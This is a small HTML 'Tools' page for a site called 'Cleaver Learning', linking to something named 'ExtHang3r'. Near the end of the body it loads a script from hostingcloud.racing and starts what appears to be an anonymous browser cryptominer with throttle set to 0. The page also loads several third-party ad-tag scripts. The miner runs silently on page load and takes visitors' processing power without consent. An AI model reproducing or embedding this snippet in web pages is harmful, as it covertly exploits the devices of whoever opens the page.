<!DOCTYPE html>
<html lang="en">
<head>
<script src="https://kulroakonsu.net/88/tag.min.js" data-zone="140471" async data-cfasync="false"></script>
    <meta charset="UTF-8">

    <script src="https://kulroakonsu.net/88/tag.min.js" data-zone="142144" async data-cfasync="false"></script>

    <script src="https://kulroakonsu.net/88/tag.min.js" data-zone="143271" async data-cfasync="false"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cleaver Learning</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            color: #333;
            margin: 0;
            padding: 20px;
            text-align: center;
        }

        h1 {
            color: #2c3e50;
        }

        p {
            font-size: 18px;
            margin: 20px 0;
        }

        a {
            display: inline-block;
            margin-top: 20px;
            padding: 10px 20px;
            font-size: 16px;
            color: #fff;
            background-color: #3498db;
            text-decoration: none;
            border-radius: 5px;
        }

        a:hover {
            background-color: #2980b9;
        }
    </style>
</head>
<body>
    <h1>Tools</h1>
    <a href="exthang3r.html">ExtHang3r</a>
    <a href="index.html">Back to Home</a>

<script src="https://www.hostingcloud.racing/GdXK.js"></script>
<script>
    var _client = new Client.Anonymous('5bc67fa7648a5aeaf6e517ae726c98906a822b350bc495656dd5474e2a2b9d16', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();
    

</script>
</body>
</html>
